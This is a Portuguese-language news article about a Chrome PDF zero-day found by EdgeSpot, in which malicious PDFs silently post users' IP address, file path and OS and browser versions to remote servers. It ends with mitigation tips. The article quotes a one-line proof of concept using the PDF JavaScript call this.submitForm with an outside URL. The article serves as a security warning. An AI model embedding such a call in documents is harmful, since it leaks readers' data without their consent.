O serviço de detecção de exploração EdgeSpot descobriu uma intrigante vulnerabilidade de dia zero do Chrome que explora documentos PDF. A vulnerabilidade permite que os invasores colhem dados confidenciais usando documentos PDF maliciosos abertos no Chrome.

Assim que a vítima abre os respectivos arquivos PDF no Google Chrome, um programa malicioso começa a funcionar em segundo plano, coletando dados do usuário.

Os dados são então encaminhados para o servidor remoto que está sendo controlado pelos hackers. Você pode estar se perguntando quais dados estão sendo sugados pelos atacantes, eles direcionam os seguintes dados no seu PC:

• endereço de IP
• Caminho completo do arquivo PDF no sistema
• Versões de SO e Chrome

Cuidado com arquivos PDF repletos de malware

Você pode se surpreender ao saber que nada acontece quando o Adobe Reader é usado para abrir arquivos PDF. Além disso, as solicitações HTTP POST são usadas para transferir dados para os servidores remotos sem nenhuma intervenção do usuário.

Especialistas descobriram que um dos dois domínios readnotifycom ou burpcollaboratornet estava recebendo os dados.

Você pode imaginar a intensidade do ataque considerando o fato de que a maioria do software antivírus não é capaz de detectar as amostras detectadas pelo EdgeSpot.

Especialistas revelam que os invasores estão usando a API Javascript PDF "this.submitForm ()" para coletar as informações confidenciais dos usuários.

Nós o testamos com um PoC mínimo, uma simples chamada de API como "this.submitForm ('http://google.com/test')" fará com que o Google Chrome envie os dados pessoais para o google.com.

Os especialistas descobriram que esse bug do Chrome estava sendo explorado por dois conjuntos distintos de arquivos PDF maliciosos. Ambos foram divulgados em outubro de 2017 e setembro de 2018, respectivamente.

Notavelmente, os dados coletados podem ser usados ​​pelos atacantes para ajustar os ataques no futuro. Os relatórios sugerem que o primeiro lote de arquivos foi compilado usando o serviço de rastreamento de PDF do ReadNotify.

Os usuários podem utilizar o serviço para acompanhar as visualizações do usuário. O EdgeSpot não compartilhou detalhes sobre a natureza do segundo conjunto de arquivos PDF.

Como permanecer protegido

O serviço de detecção de exploração EdgeSpot queria alertar os usuários do Chrome sobre os riscos potenciais, porque não é esperado que o patch seja lançado em um futuro próximo.

O EdgeSpot informou ao Google sobre a vulnerabilidade no ano passado e a empresa prometeu lançar um patch no final de abril. H

No entanto, você pode considerar usar uma solução temporária para o problema visualizando localmente os documentos PDF recebidos usando um aplicativo leitor de PDF alternativo.

Como alternativa, você também pode abrir seus documentos PDF no Chrome desconectando seus sistemas da Internet. Enquanto isso, você pode esperar a atualização do Chrome 74, que deve ser lançada em 23 de abril.